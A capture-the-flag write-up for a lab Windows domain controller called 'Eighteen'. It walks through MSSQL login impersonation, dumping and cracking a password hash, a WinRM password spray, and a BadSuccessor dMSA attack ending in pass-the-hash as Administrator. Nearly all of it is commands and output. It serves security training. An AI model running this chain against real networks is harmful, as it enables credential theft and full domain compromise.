Eighteen
by 0xW1LD
Enumeration
As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!
Scans
As usual we start off with an nmap port scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.146.140:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.146.140:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-11-16T08:48:15+00:00; +6h59m56s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-16T07:25:34
| Not valid after: 2055-11-16T07:25:34
| MD5: 321f:3620:5365:3c5e:d4fd:dc1a:d666:39d1
| SHA-1: 55bd:2897:3106:99be:7eda:5081:6e43:08da:67e2:ad7b
| -----BEGIN CERTIFICATE-----
| MIIEADCCAmigAwIBAgIQWAuQSaqN169EakYxp44TQTANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUxMTE2MDcyNTM0WhgPMjA1NTExMTYwNzI1MzRaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBALr37Sqe
| +4Uy1wtJsHiJ2mHqaNkA+/5ACRmDF7o8oQ9l5f3/sJgJpIeZXbqbL9zpVmBmy5go
| rpGSCqrOFcP3y6hW8d9cg88JulX7pKl+Wpg9e1ruFjeUwSCdJBTTYmS0YUq/0yqT
| oWR8xcpoYbuJcbQh/uXT5h5ALrdPBqWDtuITtScDkv47ChodZeoIhmxc83xouQm+
| eZdWb24UTZF9WM6HzFIV5do4F+bkVANc2modF+2pjwFSZ//yyLRI9Q9oaokio2Y6
| yBLl42k5s2dnq7AArorgn8rx6NPJY/iqxJ71P37hznb9rLJxT2fzJ/eCCgk09lUm
| UCTes4oeH/fchUM4jjg4wwNG2brWNiSJZ8Xi7e+5wp7GZb+nybFrOAoQwOvcvQay
| xOZpQFATEJBeWQWaO0NYjKDn1B+6pZs6/3Hhh97O36XWbvJYBpWgUheXj1qEmJ+j
| Hw2z67dKG/sBj1uPjZjgYSyi5xPE9ruEIjsqegW//PxFFhR5MtS7qfzU/QIDAQAB
| MA0GCSqGSIb3DQEBCwUAA4IBgQB87vxxjJvv54Yk2e0vP+4iNCdW8bzCGBpH0WcN
| gA40ImgBMlh7E63kmM1EweGv0C3sif0Eex0/C5cRe0muufMgVQOVwjoT2nlS9sCI
| zv04HozhOXK7QLfQdz4XmILvJ0DZUXmNRhFdy/BDQE3GkZ3ihcAeV3qKSpDS7nAC
| 4YewEwq3gDCZqLr2SBqRqKmkrBELGBbFsMyt06SiOP/Q+aq9wlWbpXdRfxZNz0Pl
| 17VzmQDxnPZx3fLAhTYvZ3DoBeqUGWUfqsd7K4KWJsnGcXLMyAhpa1EMf5Ka2S95
| pg6nUyM6U+wRdPVZxTF02YIs2GV40ReBtuKZyKlxvUuwBWLg9jAa8CdVlNPwCaBJ
| HO21Bi/1PfFOGLSEuoH258P/lO6g3OkPVcSU4i+hjQUAG82NWOsMg2t9pABl855d
| AS+t0bq9TsHc8x/tebLQxM7RhPqbq4U5CIhXeQkD21W8mXqUxMsG/X73zD5g8LTK
| Z0H3WjhiRDGvr8SSs4p2al8Cbfc=
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m55s
Looks like we only have a few ports despite having a Domain Controller.
80 - HTTP IIS1433 - MSSQL5985 - WinRM http
Let’s add the domain to our hosts and attempt to do an rid-brute to extract all the users and groups
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
nxc mssql 'dc01.eighteen.htb' -u 'kevin' -p 'iNa2we6haRj2gaw!' --rid-brute 10000 --local-auth
MSSQL 10.129.146.140 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.146.140 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.146.140 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.146.140 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.146.140 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.146.140 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.146.140 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.146.140 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.146.140 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.146.140 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.146.140 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.146.140 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.146.140 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.146.140 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.146.140 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.146.140 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.146.140 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.146.140 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.146.140 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.146.140 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.146.140 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.146.140 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.146.140 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.146.140 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.146.140 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.146.140 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.146.140 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.146.140 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.146.140 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.146.140 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.146.140 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.146.140 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.146.140 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.146.140 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.146.140 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.146.140 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.146.140 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.146.140 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.146.140 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.146.140 1433 DC01 1612: EIGHTEEN\dave.green
Since we can authenticate to mssql let’s get an interactive sql shell using mssqlclient.py from the impacket example scripts.
1
2
3
4
5
6
7
8
9
10
11
12
mssqlclient.py 'eighteen.htb/kevin:iNa2we6haRj2gaw!@dc01.eighteen.htb'
Impacket v0.13.0.dev0+20251016.112753.23a36c62 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (kevin guest@master)>
Enumerating the databases we can find the financial_planner database, which we currently don’t have any access on.
1
2
3
4
5
6
7
8
SQL (kevin guest@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
Taking a look around it looks like we can impersonate the appdev account.
1
2
3
4
5
6
7
8
9
10
SQL (kevin guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
------ --------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
kevin SQL_LOGIN 0 0 0 0 0 0 0 0 0
appdev SQL_LOGIN 0 0 0 0 0 0 0 0 0
SQL (kevin guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
b'LOGIN' b'' IMPERSONATE GRANT kevin appdev
User
Database Exfiltration
As the appdev user we’re able to access the financial_planner database
1
2
3
4
5
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)>
Taking a look at the tables we can find a users table which is very interesting as user tables usually contain password hashes.
1
2
3
4
5
6
7
8
9
SQL (appdev appdev@financial_planner)> select * from INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
----------------- ------------ ----------- ----------
financial_planner dbo users b'BASE TABLE'
financial_planner dbo incomes b'BASE TABLE'
financial_planner dbo expenses b'BASE TABLE'
financial_planner dbo allocations b'BASE TABLE'
financial_planner dbo analytics b'BASE TABLE'
financial_planner dbo visits b'BASE TABLE'
Grabbing all the values in the table we can find a pbkdf2 hash.
1
2
3
4
SQL (appdev appdev@financial_planner)> select * from users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$[REDACTED] 1 2025-10-29 05:39:03
Hash Conversion
Let’s convert this hash to a hash crackable by hashcat using a technique shown by ben heater in his notes on PBKDF2-HMAC-SHA256.
1
2
3
echo -n '[REDACTED]' | xxd -r -p | base64
BnOtk[REDACTED]
echo 'sha256:600000:AMtzteQIG7yAbZIa:BnOtk[REDACTED]' > adminConverted.pem
However this doesn’t seem to work so I checked the salt and it seems to start with a null byte which wouldn’t work as a salt, so this indicates that this isn’t the base64 encoded version as suggested in ben heater’s notes.
1
2
echo 'AMtzteQIG7yAbZIa' | base64 -d | xxd
00000000: 00cb 73b5 e408 1bbc 806d 921a ..s......m.
So instead I decided to base64 encode the salt as well and try that with hashcat.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
echo -n 'AMtzteQIG7yAbZIa' | base64
QU10enRlUUlHN3lBYlpJYQ==
echo 'sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:Bn0tk[REDACTED]' > adminConverted.pem
hashcat -m 10900 -a 0 adminConverted.pem /usr/share/wordlists/rockyou.txt.gz
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-AMD Ryzen 7 5800H with Radeon Graphics, 2222/4445 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory allocated for this attack: 514 MB (3232 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt.gz
* Passwords.: 14344385
* Bytes.....: 53357329
* Keyspace..: 14344385
sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:Bn0tk[REDACTED]:[REDACTED]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7Gd...yIcTM=
Time.Started.....: Sat Nov 15 21:19:11 2025 (7 secs)
Time.Estimated...: Sat Nov 15 21:19:18 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 171 H/s (12.27ms) @ Accel:167 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1336/14344385 (0.01%)
Rejected.........: 0/1336 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599000-599999
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> buster1
Started: Sat Nov 15 21:19:10 2025
Stopped: Sat Nov 15 21:19:20 2025
Password Spray
Success! We’ve cracked the hash, let’s try a simple password spray on all the users we found.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
nxc winrm 'dc01.eighteen.htb' -u users.txt -p '[REDACTED]' --continue-on-success
WINRM 10.129.146.140 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Enterprise Read-only Domain Controllers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Administrator:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Guest:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\krbtgt:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Users:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Guests:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Computers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Domain Controllers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Cert Publishers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Schema Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Enterprise Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Group Policy Creator Owners:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Read-only Domain Controllers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Cloneable Domain Controllers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Protected Users:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Key Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Enterprise Key Admins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Forest Trust Accounts:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\External Trust Accounts:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\RAS and IAS Servers:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Allowed RODC Password Replication Group:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Denied RODC Password Replication Group:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\DC01$:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\DnsAdmins:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\DnsUpdateProxy:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\mssqlsvc:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\SQLServer2005SQLBrowserUser$DC01:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\HR:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\IT:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\Finance:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\jamie.dunn:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\jane.smith:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\alice.jones:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [+] eighteen.htb\adam.scott:[REDACTED] (Pwn3d!)
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\bob.brown:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\carol.white:[REDACTED]
WINRM 10.129.146.140 5985 DC01 [-] eighteen.htb\dave.green:[REDACTED]
We have a successful authentication! let’s winrm into the machine!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
winrmexec.py 'eighteen.htb/adam.scott:[REDACTED]@dc01.eighteen.htb'
/home/kali/.cache/uv/environments-v2/winrmexec-8aa50ec8544e68a3/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using dc01.eighteen.htb
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://dc01.eighteen.htb:5985/wsman
PS C:\Users\adam.scott\Documents> ls ../Desktop
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/15/2025 11:24 PM 34 user.txt
Just like that, we have User!
Root
Forwarding AD Services
Taking a look around we might have a difficult time enumerating the domain since ldap is closed against us normally so we have to port forward the domain ports: 389,88,445 for ldap,kerberos, and SMB respectively. I also replaced the ip in my /etc/hosts file with the loopback ip.
Looking at our writable permissions we have permissions to CREATE_CHILD in the Staff OU.
1
2
3
4
5
6
7
8
9
10
bloodyAD -d eighteen.htb -H localhost -u 'adam.scott' -p "$PASS" get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=eighteen,DC=htb
permission: WRITE
distinguishedName: OU=Staff,DC=eighteen,DC=htb
permission: CREATE_CHILD
distinguishedName: CN=adam.scott,OU=Staff,DC=eighteen,DC=htb
permission: WRITE
We can also easily figure out that the DC is running a Windows Server 2025 despite running MSSQL Server 2022.
1
2
3
nxc smb 'dc01.eighteen.htb' -u 'adam.scott' -p "$PASS"
SMB 127.0.0.1 445 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] eighteen.htb\adam.scott:[REDACTED]
This is crucial information as in windows server 2025 a new service account type was introduced known as delegated Managed Service Account(dMSA) which can be exploited as demonstrated by this blog talking about BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
Let’s attempt to do a badsuccessor attack for which we create a badsuccessor DMSA account under the STAFF OU that can impersonate Administrator.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
bloodyAD -H dc01.eighteen.htb -d eighteen.htb -u 'adam.scott' -p "$PASS" add badSuccessor -t "CN=Administrator,CN=Users,DC=eighteen,DC=htb" --ou "OU=Staff,DC=eighteen,DC=htb" w1ld_bad
[+] Creating DMSA w1ld_bad$ in OU=Staff,DC=eighteen,DC=htb
[+] Impersonating: CN=Administrator,CN=Users,DC=eighteen,DC=htb
Clock skew detected. Adjusting local time by 7:01:25.978562. Retrying operation.
[+]
Realm : EIGHTEEN.HTB
Sname : krbtgt/EIGHTEEN.HTB
UserName : w1ld_bad$
UserRealm : eighteen.htb
StartTime : 2025-12-23 13:23:17+00:00
EndTime : 2025-12-23 23:23:16+00:00
RenewTill : 2025-12-24 13:23:16+00:00
Flags : forwardable, enc-pa-rep, renewable, pre-authent
Keytype : 18
Key : y1utsCCMg0tdtl/gNwC+qkIajjoGQwh/GSEPOAfoxpU=
EncodedKirbi :
doIF3TCCBdmgAwIBBaEDAgEWooIE0DCCBMxhggTIMIIExKADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRn
[REDACTED]
[+] dMSA TGT stored in ccache file w1ld_bad_IY.ccache
[+]
dMSA current keys found in TGS:
[+] AES256: 480b8d5308befceb976d24b91b73771592bad1bf1d20636e202eaa5ea5cbe0ec
[+] AES128: 5a5d12ebd4c8ec6858021de2ad0b8a0b
[+] RC4: 20c3133[REDACTED]
[+]
dMSA previous keys found in TGS (including keys of preceding managed accounts):
[+] RC4: 0b133be956bfadd[REDACTED]
You may be expriencing an error in
bloodyADwherein it’s attempting toencodealistor if you get an error regardingcompatible_dcsupdate your version ofbloodyADas these issues are fixed in2.5.1. In further versions you might have to use the--prepatchflag as thebadSuccessorattack has changed.
Let’s use the previous RC4 key found in the TGS to authenticate.
1
2
3
4
5
6
7
8
9
10
11
12
nxc smb 'dc01.eighteen.htb' -u 'Administrator' -H "$HASH" -x 'dir "C:/Users/Administrator/Desktop"'
SMB 127.0.0.1 445 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] eighteen.htb\Administrator:0b13[REDACTED] (Pwn3d!)
SMB 127.0.0.1 445 DC01 [+] Executed command via atexec
SMB 127.0.0.1 445 DC01 Volume in drive C has no label.
SMB 127.0.0.1 445 DC01 Volume Serial Number is E154-392A
SMB 127.0.0.1 445 DC01 Directory of C:\Users\Administrator\Desktop
SMB 127.0.0.1 445 DC01 11/10/2025 04:39 PM <DIR> .
SMB 127.0.0.1 445 DC01 11/10/2025 02:15 PM <DIR> ..
SMB 127.0.0.1 445 DC01 12/23/2025 04:44 AM 34 root.txt
SMB 127.0.0.1 445 DC01 1 File(s) 34 bytes
SMB 127.0.0.1 445 DC01 2 Dir(s) 5,557,919,744 bytes free
Just like that, we have Root!
tags: boxes - os/windows - diff/easy